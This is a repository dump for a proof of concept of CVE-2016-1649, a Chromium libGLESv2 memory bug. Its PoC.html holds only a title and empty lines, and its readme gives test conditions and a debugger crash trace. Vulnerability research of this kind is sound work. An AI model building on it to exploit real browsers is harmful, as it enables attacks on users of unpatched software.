└── CVE-2016-1649
├── PoC.html
└── readme.md
/CVE-2016-1649/PoC.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | CVE-2016-1649 PoC
4 |
5 |
6 |
7 |
8 |
14 |
15 |
16 |
17 |
149 |
150 |
--------------------------------------------------------------------------------
/CVE-2016-1649/readme.md:
--------------------------------------------------------------------------------
1 | ###Intro
2 | PoC for [CVE-206-1649](http://www.zerodayinitiative.com/advisories/ZDI-16-224/), tested on Windows 10 with
3 | Chromium 47.0.2526.0 installed.
4 |
5 |
6 | ###Crash
7 | ```
8 | (11b8.1060): Access violation - code c0000005 (!!! second chance !!!)
9 | eax=09c40f98 ebx=06c4f070 ecx=00000000 edx=00000004 esi=fd00f06c edi=00008b56
10 | eip=5b935828 esp=0014e954 ebp=0014e958 iopl=0 nv up ei pl zr na pe nc
11 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
12 | libglesv2!gl::`anonymous namespace'::UniformStateQueryCastLoop+0x18:
13 | 5b935828 807c06fc01 cmp byte ptr [esi+eax-4],1 ds:0023:06c50000=??
14 | ```
--------------------------------------------------------------------------------